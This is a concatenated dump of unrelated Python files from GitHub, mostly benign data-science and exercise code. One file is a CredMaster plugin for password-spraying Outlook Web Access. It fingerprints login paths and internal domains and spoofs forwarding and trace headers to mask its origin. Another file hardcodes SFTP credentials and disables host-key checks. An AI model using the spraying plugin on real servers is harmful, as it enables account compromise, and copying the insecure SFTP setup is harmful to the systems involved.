time.time()\nmain.bowtie2_map(fasta1=fq_gz1,fasta2=fq_gz2,index=home+\"home/reference_genome/\"+args[2],sam=home+\"home/bowtie2/\"+args[1]+\".sam\",unmap=home+\"home/bowtie2/\"+args[1]+\"_filterhost.fq\",threads=args[3])\nend = time.time()\nprint(\"Filter host:\"+str(end-start))\n\n#Sort bam\nstart = time.time()\nmain.sort_bam(bam=home+\"home/bowtie2/\"+args[1]+\".sam.bam\",out=home+\"home/bowtie2/\"+args[1]+\"_sorted.bam\",threads=args[3])\nend = time.time()\nprint(\"Sort bam:\"+str(end-start))\n\n#Compute depth\nstart = time.time()\nmain.compute_depth(bam=home+\"home/bowtie2/\"+args[1]+\"_sorted.bam\",out=home+\"home/bowtie2/depth_\"+args[1]+\"_\"+args[2]+\".txt\")\nend = time.time()\nprint(\"Compute depth:\"+str(end-start))\n","repo_name":"CongLiu37/PlayGround","sub_path":"Code/2_FilterHost.py","file_name":"2_FilterHost.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19483472911","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.functions import *\n\n'''\nThis pyspark scrip read csv data of electric vehicle population\nRemove records with null vin\nReplace any nulls values with space\nRemove special chars(*#) from all the columns\nWrite to parquet table.\n'''\nelectric_vehicle_population_data = sys.argv[1]\n\nspark = SparkSession.builder.appName(\"Pyspark-Electric-Vehicle-Population - Ingestion\").getOrCreate()\nspark.sparkContext.setLogLevel('WARN')\n\n# set up logger using spark logger\nlog4jLogger = spark._jvm.org.apache.log4j\nlog4jLogger = spark._jvm.org.apache.log4j\nlogger = log4jLogger.LogManager.getLogger(__name__)\n\nlogger.info(\"pyspark electric vehicle script logger initialized\")\n\nlogger.info(\"electric_vehicle_population_data: \" + electric_vehicle_population_data)\n\n\ndef write_to_table(output_df, table_name):\n # Check if already exists or not\n # If already exists append the data or create table on the fly\n\n if spark.catalog.tableExists(table_name):\n output_df.write.mode(\"append\").format(\"parquet\").partitionBy(*[\"country\", \"state\"]).saveAsTable(table_name)\n else:\n output_df.write.mode(\"overwrite\").format(\"parquet\").partitionBy(*[\"country\", \"state\"]).saveAsTable(table_name)\n\n\ndef clean_df(df: DataFrame) -> DataFrame:\n # Replace char * and # with space\n for col_name in df.columns:\n df = df.withColumn(col_name, regexp_replace(col(col_name), \"[\\\\*|\\\\#]\", \"\"))\n return df\n\n\ndef read_csv(in_path: str, delimiter: str, header: str) -> DataFrame:\n # Reading csv with inferschema.\n # Enabling infer schema will do two read operations, which will not be good idea, better to provide schema explicitly\n return spark.read.format(\"csv\") \\\n .option(\"header\", header) \\\n .option(\"inferSchema\", \"true\") \\\n .option(\"delimiter\", delimiter) \\\n .option(\"quote\", '\"') \\\n .option(\"escape\", '\"') \\\n .load(in_path)\n\n\ntry:\n in_df = read_csv(electric_vehicle_population_data, \",\").filter(col(\"vin\").isNotNull()).na.fill(\"\")\n cleaned_df = clean_df(in_df)\n write_to_table(cleaned_df, \"default.electric_vehicle_population\")\n spark.stop()\n logger.error(\"Application succeeded\")\nexcept Exception as e:\n logger.error(\"Application failed with error: \" + str(e))\n spark.stop()\n raise e\n","repo_name":"venkateshur/Data-Engineer-Training---Batch1","sub_path":"py_spark/data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73317448568","text":"import glob\n\nchild_lst = []\nparent_lst = []\nlist_of_no_child = []\nlist_of_no_parents=[]\nnum_of_no_parents = 0\nlist_of_files = glob.glob('./files/*.txt')\nfor f in list_of_files:\n child = f[8:-4]\n child_lst.append(child)\n parent = open(f).read()\n parent_lst.append(parent)\n\n# فایلی که هیچ parent ی ندارد را بیابید\n\n if parent == \"0\":\n list_of_no_parents.append(child)\n num_of_no_parents += 1\nprint(num_of_no_parents, \"files has no parent.\")\nprint(\"list of files that has no parent:\", list_of_no_parents)\n\n#لیستی از تمامی فایل‌هایی که هیچ childی ندارد را (به صورت sort شده) در فایل no_children.txt ذخیره کنید\n\ndef difference (list1, list2):\n list_dif = [i for i in list1 + list2 if i not in list2]\n return list_dif\n\nno_child_list = difference(child_lst,parent_lst)\n\nno_children = open(\"no_children.txt\", mode=\"a\")\nfor i in range(len(no_child_list)):\n no_children.write(no_child_list[i])\n no_children.write(\"\\n\")\n\n#طولانی ترین مسیر ممکن را پیدا کنید و تمام اعضایی که در مسیر آن دیده شده را در فایل longest_path.txt ذخیره کنید.\n\ndef find_parents_children(key):\n dic_p ={}\n lst_ch = []\n for f in list_of_files:\n inside = open(f,mode=\"r\").read()\n if inside == key:\n name_of_file = f[8:-4]\n lst_ch.append(name_of_file)\n dic_p.update({key:lst_ch})\n\n return dic_p\n\nprint(find_parents_children(\"1073414247\"))\n\n\n#for i in range(len(list_of_no_parents)):\n #dic_key = list_of_no_parents[i]\ndic_of_parents = find_parents_children(\"1073414247\")\nchildren_in_dic_lst = dic_of_parents.get(\"1073414247\")\nfor j in range(len(children_in_dic_lst)):\n new_key = children_in_dic_lst[j]\n print(find_parents_children(new_key))\n\n","repo_name":"baharakd/bahar-py","sub_path":"files everywhere.py","file_name":"files everywhere.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"fa","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"29325150067","text":"import ecuaciones1D as s\nx1 = 20\nx2 = 30\nH = 8\n\ndef F(x, x1, x2, H):\n return x**3 * (x-4*H) - (x1**2-x2**2)**2\nfrom functools import partial\n\nf = partial(F, x1=x1, x2=x2, H=H)\n\ns.biseccion(f, 0, 100)\n\nr = s.biseccion(f, 30, 40)\nx = r.x\n\ndef G(A, x, x1, x2):\n import math\n return A + math.sqrt(A**2-(x1**2-x2**2)) - x\ng = partial(G, x=x, x1=x1, x2=x2)\n\nR = s.biseccion(g, 10, 20)\nA = R.x\n\nimport math\nW = math.sqrt(x1**2 - A**2)\n","repo_name":"mlares/computacion_Famaf","sub_path":"ejemplos/raices/escaleras.py","file_name":"escaleras.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12246477207","text":"# Classifier Functions for the project\n# Rune Zeitzen\n# June 2023\n\n############################################# Import packages #############################################\n\nimport pandas as pd\nimport numpy as np\nfrom tensorflow import keras\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.utils import pad_sequences\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Embedding, LSTM, SpatialDropout1D, BatchNormalization\nfrom sklearn.model_selection import train_test_split\n\nfrom keras.models import load_model\nfrom sklearn.metrics import classification_report, confusion_matrix, roc_curve, auc\nfrom keras.callbacks import ModelCheckpoint\nfrom keras import regularizers\nimport os\nimport re\nimport time\nimport pickle\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n\n\n############################################# Helper Functions #############################################\n\ndef get_next_model_number(directory):\n # Get list of all files/directories in the given directory\n files = os.listdir(directory)\n \n # Initialize the highest model number found to 0\n highest_num = 0\n\n # Regular expression to match 'saved_model_{number}'\n pattern = re.compile(r'saved_model_(\\d+)\\.h5')\n \n # Iterate through all files/directories\n for file in files:\n match = pattern.match(file)\n \n # If this file/directory matches the pattern\n if match:\n # Extract the number from the filename\n num = int(match.group(1))\n \n # If this number is higher than any we've seen before, update highest_num\n if num > highest_num:\n highest_num = num\n\n # Return the next model number\n return highest_num + 1\n\ndef evaluate_model(model, X_test, y_test, plot = False, vocab_size = None, name = None):\n # Calculate loss and accuracy \n loss, accuracy = model.evaluate(X_test, y_test, verbose=0)\n print(\"Loss: \", loss)\n print(\"Accuracy: \", accuracy)\n\n # Generate predictions\n y_pre = model.predict(X_test)\n\n # Choose a threshold for classification\n y_pred = np.where(y_pre >= 0.5, 1, 0)\n\n # Calculate Confusion Matrix\n print(\"Confusion Matrix:\")\n conf_matrix = confusion_matrix(y_test, y_pred)\n print(conf_matrix)\n\n # Calculate Precision, Recall, F1 Score\n print(\"Classification Report:\")\n print(classification_report(y_test, y_pred))\n\n # Calculate ROC Curve and AUC\n fpr, tpr, thresholds = roc_curve(y_test, y_pre)\n roc_auc = auc(fpr, tpr)\n print(\"AUC of ROC Curve:\", roc_auc)\n\n if plot:\n # Create a figure\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(12, 5))\n\n fig.suptitle(f'Confusion Matrix and ROC Curve\\nBest LSTM Model', fontsize=20, y = 1.05)\n\n # Plot confusion matrix\n sns.heatmap(conf_matrix, cmap='Blues', annot=True, fmt=\"d\", ax=ax1, vmin = 0)\n #ax1.set_title('Confusion Matrix')\n ax1.set_xlabel('Predicted Label')\n ax1.set_ylabel('True Label')\n\n # Plot ROC curve\n ax2.plot(fpr, tpr, color='b', label='ROC curve (area = %0.2f)' % roc_auc)\n ax2.plot([0, 1], [0, 1], color='k', linestyle='--')\n ax2.set_xlim([-0.01, 1.01])\n ax2.set_ylim([-0.01, 1.01])\n ax2.set_xlabel('False Positive Rate')\n ax2.set_ylabel('True Positive Rate')\n plot_params(ax2)\n\n data = [accuracy, loss, roc_auc, vocab_size]\n \n string = f'Accuracy: {data[0]:.4f}\\nBCE (LogLoss): {data[1]:.4f}\\nROC AUC: {data[2]:.3f}\\n\\nVocabulary Size: {data[3]}'\n plot_text(ax2, 0.5, 0.1, string, size = 12, box = True, color = 'k', font_style = 'italic')\n\n # Save the figure\n plt.savefig(f'Result_Models/RNN/evaluation_RNNLSTM_{name}_{vocab_size}.png', dpi=300, bbox_inches='tight')\n\n plt.show()\n\n # Return all metrics\n return loss, accuracy, y_pre, y_pred, roc_auc\n\n\n############################################# RNN-LSTM Function #############################################\n\ndef RNN_LSTM(data, labels, epoch = 20, batchsize = 256 * 8, max_features = 10000, names = None, plotIT = False, train = None):\n \"\"\"\n Function to run a RNN-LSTM model on the data.\n data: dataframe with columns 'title', 'text' and 'label'\n lables: labels for the data\n epochs: number of epochs to train the model\n batchsize: batch size to train the model \n name: name of the model ( used to save the model )\n \"\"\"\n\n name = get_next_model_number('Result_Models/RNN_MODELS')\n\n X_train, X_val, y_train, y_val = train_test_split(data, labels, test_size=0.3, random_state=42)\n\n X_val, X_test, y_val, y_test = train_test_split(X_val, y_val, test_size=0.5, random_state=42)\n\n ############################################# Train the model #############################################\n\n if train is None:\n\n train = input('\\nTrain the model? (y/n): ')\n\n if train == 'y':\n\n model = Sequential()\n model.add(Embedding(max_features, 32)) \n model.add(LSTM(32, dropout=0.2, recurrent_dropout=0.2)) \n model.add(Dense(1, activation='sigmoid', kernel_regularizer=regularizers.l2(0.01))) \n \n batch_size = batchsize\n epochs = epoch\n\n optimize = keras.optimizers.legacy.Adam(lr = 0.001)\n\n model.compile(loss='binary_crossentropy',\n optimizer=optimize,\n metrics=['accuracy'])\n\n print(model.summary())\n\n # Specify the path where you want to save the model\n filepath = f\"Result_Models/RNN_MODELS/saved_model_{name}.h5\"\n\n # Initialize ModelCheckpoint\n checkpoint = ModelCheckpoint(filepath, monitor='val_loss', verbose=1, save_best_only=True, mode='min')\n\n # Pass the ModelCheckpoint callback to model.fit() function\n history = model.fit(X_train, y_train, \n batch_size=batch_size, \n epochs=epochs, \n validation_data=(X_val, y_val),\n callbacks=[checkpoint])\n \n if not plotIT:\n plot = input('\\nPlot the loss? (y/n): ')\n\n else:\n plot = 'y'\n\n if plot == 'y':\n\n fig, ax = plt.subplots(figsize=(7,4))\n ax.plot(history.history['loss'], label='Train', color = 'k')\n ax.plot(history.history['val_loss'], label='Validation', color = 'b')\n ax.set_title('Model Loss vs Epoch')\n ax.set_ylabel('Loss')\n ax.set_xlabel('Epoch')\n ax.set_xticks(np.arange(0, epochs+1, 5))\n legend(ax, loc='upper right')\n plot_params(ax)\n plt.tight_layout()\n plt.savefig(f'Result_Models/RNN/loss_{names}_{max_features}.png', dpi=300, bbox_inches='tight')\n plt.show()\n\n if not plotIT:\n save = input('\\nSave the plot? (y/n): ')\n\n else:\n save = 'y'\n if save == 'n' or '':\n os.remove(f'Result_Models/RNN/loss_{names}_{max_features}.png')\n\n\n model_best = load_model(f'Result_Models/RNN_MODELS/saved_model_{name}.h5')\n\n \n if train == 'n' or train == '':\n name_in = input('\\nName of the model: ')\n model_best = load_model(f'Result_Models/RNN_MODELS/saved_model_{name_in}.h5')\n\n ############################################# Evaluate the model #############################################\n\n print('\\nEvaluating the model...')\n\n loss, accuracy, y_pre, y_pred, roc_auc = evaluate_model(model_best, X_test, y_test, plot = plotIT, vocab_size=max_features, name = names)\n\n\nfrom lightgbm import LGBMClassifier\nfrom lightgbm import early_stopping, log_evaluation\nfrom sklearn.metrics import accuracy_score, log_loss, confusion_matrix, roc_auc_score\n\nimport matplotlib.pyplot as plt\n\n\ndef LightGBM(X_train, y_train, X_test, y_test):\n \"\"\"\n Trains a LightGBM binary classifier on the provided training data, \n then makes predictions on the test data and evaluates the model's performance.\n\n Parameters\n ----------\n X_train : array-like of shape (n_samples, n_features)\n The training input samples.\n y_train : array-like of shape (n_samples,)\n The target values (class labels) as integers or strings.\n X_test : array-like of shape (n_samples, n_features)\n The test input samples.\n y_test : array-like of shape (n_samples,)\n The true values (class labels) for the test input samples.\n test_size : float, optional (default=0.5)\n The proportion of the test data to be used as the test set, with the remainder used as the validation set.\n random_state : int, optional (default=42)\n The seed used by the random number generator.\n plot : boolean, optional (default=False)\n If True, plot a subplot with a confusion matrix and a ROC curve.\n\n Returns\n -------\n accuracy : float\n The accuracy of the model on the test data.\n bce_loss : float\n The binary cross-entropy loss of the model on the test data.\n conf_matrix : ndarray of shape (n_classes, n_classes)\n The confusion matrix of the model's predictions on the test data.\n roc_auc : float\n The ROC AUC score of the model on the test data.\n \"\"\"\n\n print(\"\\nSplitting test data into validation and test sets...\")\n\n X_val, X_test_new, y_val, y_test_new = train_test_split(X_test, y_test, test_size=0.5)\n\n print(\"\\nTraining LightGBM classifier...\")\n\n # Initialize our classifier with specified parameters to combat overfitting\n clf = LGBMClassifier(n_estimators=100, learning_rate=0.01, max_depth=3, subsample=0.8, reg_alpha=0.1, reg_lambda=0.1)\n\n # Train the classifier\n clf.fit(X_train, y_train, eval_set=(X_val, y_val), early_stopping_rounds=50, verbose=False)\n\n print(\"\\nEvaluating model...\")\n\n # Make predictions on the new test set\n y_pred = clf.predict(X_test_new)\n\n # Predict probabilities for log loss\n y_pred_prob = clf.predict_proba(X_test_new)\n\n # Calculate accuracy\n accuracy = accuracy_score(y_test_new, y_pred)\n print(f\"\\nAccuracy: {accuracy}\")\n\n # Calculate log loss (binary cross entropy)\n bce_loss = log_loss(y_test_new, y_pred_prob)\n print(f\"\\nBinary Cross Entropy Loss: {bce_loss}\")\n\n # Calculate confusion matrix\n conf_matrix = confusion_matrix(y_test_new, y_pred)\n print(f\"\\nConfusion Matrix: \\n{conf_matrix}\")\n\n # Calculate ROC AUC score\n roc_auc = roc_auc_score(y_test_new, y_pred_prob[:,1])\n print(f\"\\nROC AUC Score: {roc_auc}\")\n\n return accuracy, bce_loss, conf_matrix, roc_auc, y_pred, y_pred_prob[:,1], clf, y_test_new\n\n\n####################\n\ndef plot_params(ax, xlim = None, ylim = None, minor_grid = True, labsize = 12, xlocator = None, ylocator = None, log = (False,False)):\n\n ax.minorticks_on()\n ax.tick_params(axis='both', length = 10, which='major', labelsize=labsize)\n ax.tick_params(axis='both', length = 5, which='minor', labelsize=labsize)\n ax.grid(which = 'major',linestyle = ':',color = '0.25')\n \n if minor_grid:\n ax.grid(which = 'minor',linestyle = ':',color = '0.75')\n\n if xlim is not None:\n ax.set_xlim(xlim)\n\n if ylim is not None:\n ax.set_ylim(ylim)\n\n if xlocator is not None:\n from matplotlib.ticker import AutoMinorLocator\n minor_locator = AutoMinorLocator(xlocator)\n ax.xaxis.set_minor_locator(minor_locator)\n if ylocator is not None:\n from matplotlib.ticker import AutoMinorLocator\n minor_locator = AutoMinorLocator(ylocator)\n ax.yaxis.set_minor_locator(minor_locator)\n\n\n if log[0]:\n ax.set_xscale('log')\n if log[1]:\n ax.set_yscale('log')\n\n####################\n\ndef legend(ax, loc = 'lower left', size = 10, cols = None, fancy = False, shad = True, title = None, titsize = 12, bbox_to_anchor = None):\n if bbox_to_anchor is None:\n if title is None:\n if cols is None:\n ax.legend(loc=loc,prop={'size': size},framealpha = 1, facecolor = '1',edgecolor = 'black', shadow = shad, fancybox = fancy)\n if cols is not None:\n ax.legend(loc=loc,ncol = cols,prop={'size': size},framealpha = 1, facecolor = '1',edgecolor = 'black', shadow = shad, fancybox = fancy)\n if bbox_to_anchor is not None:\n if title is not None:\n if cols is None:\n ax.legend(loc=loc,prop={'size': size},framealpha = 1, facecolor = '1',edgecolor = 'black', shadow = shad, fancybox = fancy, title = title, title_fontsize = titsize, bbox_to_anchor = bbox_to_anchor)\n if cols is not None:\n ax.legend(loc=loc,ncol = cols,prop={'size': size},framealpha = 1, facecolor = '1',edgecolor = 'black', shadow = shad, fancybox = fancy,title = title, title_fontsize = titsize, bbox_to_anchor = bbox_to_anchor)\n\n####################\n\ndef plot_text(ax, x, y, string, size = 12, box = True, color = 'k', font_style = 'normal'):\n if box:\n return ax.text(x, y, string,c = color,size = size,bbox=dict(boxstyle='Square', facecolor='white', alpha=1), family='monospace', fontstyle = font_style)\n else:\n return ax.text(x, y, string,c = color,size = size, family='monospace', fontstyle = font_style)\n\n# Plot the confusion matrix and ROC curve\ndef plot_confusion_matrix_and_roc(y_test, y_pred, y_pred_probs, name, vobab, type = 'LightGBM', data = None):\n\n font = {'family': 'monospace'}\n plt.rc('font', **font)\n\n # Compute the confusion matrix\n conf_matrix = confusion_matrix(y_test, y_pred)\n\n # Compute ROC curve and ROC area\n fpr, tpr, _ = roc_curve(y_test, y_pred_probs)\n roc_auc = auc(fpr, tpr)\n\n # Create a figure\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(12, 5))\n\n fig.suptitle(f'Confusion Matrix and ROC Curve\\nBest {type} Model', fontsize=20, y = 1.05)\n\n # Plot confusion matrix\n sns.heatmap(conf_matrix, cmap='Blues', annot=True, fmt=\"d\", ax=ax1, vmin = 0)\n #ax1.set_title('Confusion Matrix')\n ax1.set_xlabel('Predicted Label')\n ax1.set_ylabel('True Label')\n\n # Plot ROC curve\n ax2.plot(fpr, tpr, color='b', label='ROC curve (area = %0.2f)' % roc_auc)\n ax2.plot([0, 1], [0, 1], color='k', linestyle='--')\n ax2.set_xlim([-0.01, 1.01])\n ax2.set_ylim([-0.01, 1.01])\n ax2.set_xlabel('False Positive Rate')\n ax2.set_ylabel('True Positive Rate')\n #ax2.set_title('Receiver Operating Characteristic')\n if data is None:\n legend(ax2,loc='lower right')\n plot_params(ax2)\n\n if data is not None:\n string = f'Accuracy: {data[0]:.4f}\\nBCE (LogLoss): {data[1]:.4f}\\nROC AUC: {data[2]:.3f}\\n\\nVocabulary Size: {data[3]}'\n plot_text(ax2, 0.5, 0.1, string, size = 12, box = True, color = 'k', font_style = 'italic')\n\n # Save the figure\n plt.savefig(f'Result_Models/Tree/evaluation_{type}_{name}_{vobab}.png', dpi=300, bbox_inches='tight')\n\n plt.show()\n\n####################\n\nimport numpy as np\nfrom sklearn.model_selection import learning_curve\nimport matplotlib.pyplot as plt\nfrom lightgbm import LGBMClassifier\n\ndef plot_learning_curve(model, X, y, cv = 5, num = 10):\n\n\n train_sizes, train_scores, test_scores = learning_curve(model, X, y, cv=cv, train_sizes=np.linspace(0.1, 1.0, num))\n\n train_scores_mean = np.mean(train_scores, axis=1)\n train_scores_std = np.std(train_scores, axis=1)\n test_scores_mean = np.mean(test_scores, axis=1)\n test_scores_std = np.std(test_scores, axis=1)\n\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std, train_scores_mean + train_scores_std, alpha=0.1, color='r')\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std, test_scores_mean + test_scores_std, alpha=0.1, color='g')\n\n plt.plot(train_sizes, train_scores_mean, 'o-', color='r', label='Training score')\n plt.plot(train_sizes, test_scores_mean, 'o-', color='g', label='Cross-validation score')\n\n plt.title('Learning curves with error bars')\n plt.xlabel('Training examples')\n plt.ylabel('Score')\n plt.legend(loc='best')\n plt.show()\n\n####################\n\nfrom sklearn.model_selection import cross_val_score\n\ndef cross_val(model, X, y, cv = 5):\n scores = cross_val_score(model, X, y, cv=cv)\n\n print(\"Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n\n return scores","repo_name":"Chrowian/Final_Project_GutQuaadeHaldorZeitzen","sub_path":"classifier_funcs.py","file_name":"classifier_funcs.py","file_ext":"py","file_size_in_byte":16447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37596622949","text":"import requests\nimport utils.utils as utils\nfrom urllib.parse import urlparse\nfrom credmaster import log_entry\nrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)\n\npaths = {'OWA version 2003': '/exchweb/bin/auth/owaauth.dll',\n 'OWA version 2007': '/owa/auth/owaauth.dll',\n 'OWA version > 2007': '/owa/auth.owa'}\n\ndef check_url(url):\n r = requests.get(url, verify=False)\n return r.status_code\n\ndef check_path(url):\n current_path = urlparse(url).path\n if not current_path or current_path == \"/\":\n srv = url.rstrip('/') # just in case\n log_entry('Trying to guess OWA version. Please wait...')\n for key, value in paths.items():\n url_value = srv + value\n if check_url(url_value) == 200:\n log_entry('Looks like %s' % key)\n log_entry('Using \"%s\" as a target' % url_value)\n return url_value\n else:\n log_entry('[!] Unable to find OWA - using \"%s\" as a target' % url)\n return url\n\n\ndef validate(pluginargs, args):\n #\n # Plugin Args\n #\n # --url https://mail.domain.com -> OWA mail target\n #\n if 'url' in pluginargs.keys():\n return True, None, pluginargs\n else:\n error = \"Missing url argument, specify as --url https://mail.domain.com\"\n return False, error, None\n\n\ndef testconnect(pluginargs, args, api_dict, useragent):\n\n url = api_dict['proxy_url']\n\n success = True\n headers = {\n 'User-Agent': useragent,\n \"X-My-X-Forwarded-For\" : utils.generate_ip(),\n \"x-amzn-apigateway-api-id\" : utils.generate_id(),\n \"X-My-X-Amzn-Trace-Id\" : utils.generate_trace_id(),\n }\n\n headers = utils.add_custom_headers(pluginargs, headers)\n\n server_url = pluginargs['url']\n owa_server = check_path(pluginargs['url'])\n\n resp = requests.get(url, headers=headers, verify=False)\n\n if resp.status_code == 504:\n output = \"Testconnect: Connection failed, endpoint timed out, exiting\"\n success = False\n else:\n output = \"Testconnect: Fingerprinting host... Internal Domain name: {domain}, continuing\"\n\n if success:\n domainname = utils.get_owa_domain(server_url, \"/autodiscover/autodiscover.xml\", useragent)\n output = output.format(domain=domainname)\n pluginargs['domain'] = domainname\n pluginargs['url'] = owa_server\n\n return success, output, pluginargs\n","repo_name":"SecurIT360/CredMaster-S360Fork","sub_path":"plugins/owa/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"20285146827","text":"'''\nStudentID: 20CS061\nStudent Name: Tarsh Pathak\nAIM: Write a Python script to merge two Python dictionaries\n '''\n#Create Dictionary\nmydict1 = {\"fast\": \"In a quick manner\",\n \"Sam\": \"A coder\",\n \"marks\": [2, 3, 4, 5],\n \"anotherDict\": {'Tarsh': 'Player'},\n 1: 2}\n# Creating a Dictionary to update the values\nupdateDict = {\n 'Lovish': 'Friend',\n \"Shubham\": \"Friend\",\n \"Divya\": \"Friend\",\n \"Sam\": \"A Dancer\",\n}\n# Using update function to update and add the values to mydict1\nmydict1.update(updateDict)\nprint(mydict1)","repo_name":"Tarsh26/Python-Assignment-20CS061-","sub_path":"Dictionary/02_dictionary.py","file_name":"02_dictionary.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72530335610","text":"import PyQt5\nfrom PyQt5 import QtWidgets, uic\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QPushButton, QLabel, QFileDialog\nimport pysftp as sftp\n\nimport sys\nimport os\n\n#SFTP Server Setup\nHOST = \"sftp.alexpro.net\"\nPORT = 22\nUSER_NAME = \"team6\"\nPASSWORD = \"sftpPipeline\"\ncnopts = sftp.CnOpts()\ncnopts.hostkeys=None\n\nnewPreset = []\n\n#Connect to SFTP Server\ntry:\n connection = sftp.Connection(host=HOST, username=USER_NAME, password=PASSWORD, cnopts=cnopts)\n print(\"Connected!\")\n connection.cwd(\"./team6\")\n print(connection.pwd)\nexcept:\n print(\"failed to establish connection\")\n\nclass MainWindow(QtWidgets.QMainWindow):\n def __init__(self):\n \n super(MainWindow,self).__init__()\n #load UI File\n #uic.loadUi(\"guitest.ui\",self)\n uic.loadUi(r'C:\\Users\\steve\\team-6-sftp-pipeline\\Views\\guitest.ui',self)\n \n #Define Widgets\n self.Browse_Button = self.findChild(QPushButton, \"BrowseButton\")\n self.Output_Label = self.findChild(QLabel, \"File_Name_Output\")\n \n self.Preset_Button = self.findChild(QPushButton, \"PresetButton\")\n self.Preset_Label = self.findChild(QLabel, \"PresetText\")\n \n self.Undo_Button = self.findChild(QPushButton, \"Undo_Button\")\n self.Undo_Button.setEnabled(False)\n \n #Connect Browse_Button to clicker function\n self.Browse_Button.clicked.connect(self.upload_clicker)\n self.Preset_Button.clicked.connect(self.presetClicker)\n self.Undo_Button.clicked.connect(self.undo_clicker)\n \n #Show App\n self.show()\n \n #Upload File Button Clicked\n def upload_clicker(self):\n #Open File Dialog\n global fname_basefile\n \n fname = QFileDialog.getOpenFileName(self, \"Open Files\", \"C:\", \"All Files (*)\")\n fname_basefile = os.path.basename(fname[0])\n \n print(\"Uploaded File: \" + fname_basefile)\n \n #File Upload\n local_path = fname\n remote_path = \"/root/team6\"\n #Upload Command\n connection.put(fname[0], preserve_mtime=True)\n #Output success message\n print(\"File \" + fname_basefile + \" uploaded successfully!\")\n \n #output file name to screen\n if fname:\n self.File_Name_Output.setText(\"File \" + fname_basefile + \" uploaded successfully!\")\n \n #enable undo button after upload\n self.Undo_Button.setEnabled(True)\n \n def undo_clicker(self):\n \n connection.get(fname_basefile, preserve_mtime=True, localpath=r\"C:\\Users\\steve\\team-6-sftp-pipeline\\GUI-Test\\sent-back.txt\")\n self.File_Name_Output.setText(\"File \" + fname_basefile + \" downloaded successfully!\")\n \n \n #Create Preset Button Clicked \n def presetClicker(self):\n #preset base file name\n global preset_basefile\n #preset open file dialog\n presetName = QFileDialog.getOpenFileNames(self, \"Open Files\", \"C:\", \"All Files (*)\")\n \n #preset_basefile = os.path.basename(presetName)\n #print(preset_basefile)\n newPreset.append(presetName[0])\n #newPreset.append(preset_basefile)\n \n if presetName:\n presetString = ''.join(''.join(y) for y in newPreset)\n self.Preset_Label.setText(presetString)\n \n#Initialize App\napp = QApplication(sys.argv)\nUIWindow = MainWindow()\napp.exec_()\n ","repo_name":"Jorphi/SFTP-Pipeline","sub_path":"Views/guitest.py","file_name":"guitest.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27099312209","text":"class Solution:\n def canFormArray(self, arr: List[int], pieces: List[List[int]]) -> bool:\n mark = {}\n for i in range(len(pieces)):\n mark[pieces[i][0]]=i\n i=0\n while i=len(arr):\n return False\n if arr[i+j]!=pieces[index][j]:\n return False\n i=i+len(pieces[index])\n return True","repo_name":"0xtinyuk/LeetCode","sub_path":"Algorithms/1640. Check Array Formation Through Concatenation.py","file_name":"1640. Check Array Formation Through Concatenation.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"839537592","text":"#!/usr/bin/env python3\n\nimport datetime\nprint (datetime.datetime.now())\n\ndef groupbuzz(num):\n if (num % 3 == 0 and num % 5 == 0):\n print(\"GroupON\")\n elif (num % 3 == 0 ):\n print(\"Group\")\n elif(num % 5 == 0 ):\n print(\"On\")\n else:\n print(num)\n\nfor i in range(1,17):\n groupbuzz(i)\n","repo_name":"jfdetke/Python","sub_path":"grouponbuzz.py","file_name":"grouponbuzz.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71523023930","text":"from model.funcao import Funcao\nfrom config.conexao import conectar\n\n\nclass Funcionario():\n def __init__(self, nome: str, cpf: str, funcao: Funcao, salario: float, telefone: str) -> None:\n self.nome = nome\n self.cpf = cpf\n self.funcao = funcao\n self.salario = salario\n self.telefone = telefone\n self.__inserir_funcionario__()\n\n def __inserir_funcionario__(self):\n conexao = conectar()\n\n with conexao.cursor() as c:\n sql = \"INSERT INTO funcionario (cpf, nome, funcao, salario, telefone) VALUES (%s, %s, (SELECT funcao.id FROM funcao WHERE cod = %s), %s, %s)\"\n c.execute(sql, (self.cpf, self.nome, self.funcao.cod, self.salario, self.telefone))\n conexao.commit()\n conexao.close()\n\n @staticmethod\n def pesquisar_funcionario():\n cpf = input('Informe o cpf desejado: ')\n print('-'*20)\n\n conexao = conectar()\n with conexao.cursor() as c:\n sql = \"SELECT funcionario.cpf, funcionario.nome, funcionario.salario, funcionario.telefone, funcao.nome FROM funcionario, funcao WHERE funcao.id = funcionario.funcao AND funcionario.cpf = %s\"\n c.execute(sql, (cpf))\n res_one = c.fetchone()\n conexao.close()\n return res_one\n\n @staticmethod\n def __editar_funcionario__():\n registro = Funcionario.pesquisar_funcionario()\n\n if registro:\n print('O que deseja editar?')\n condicao = 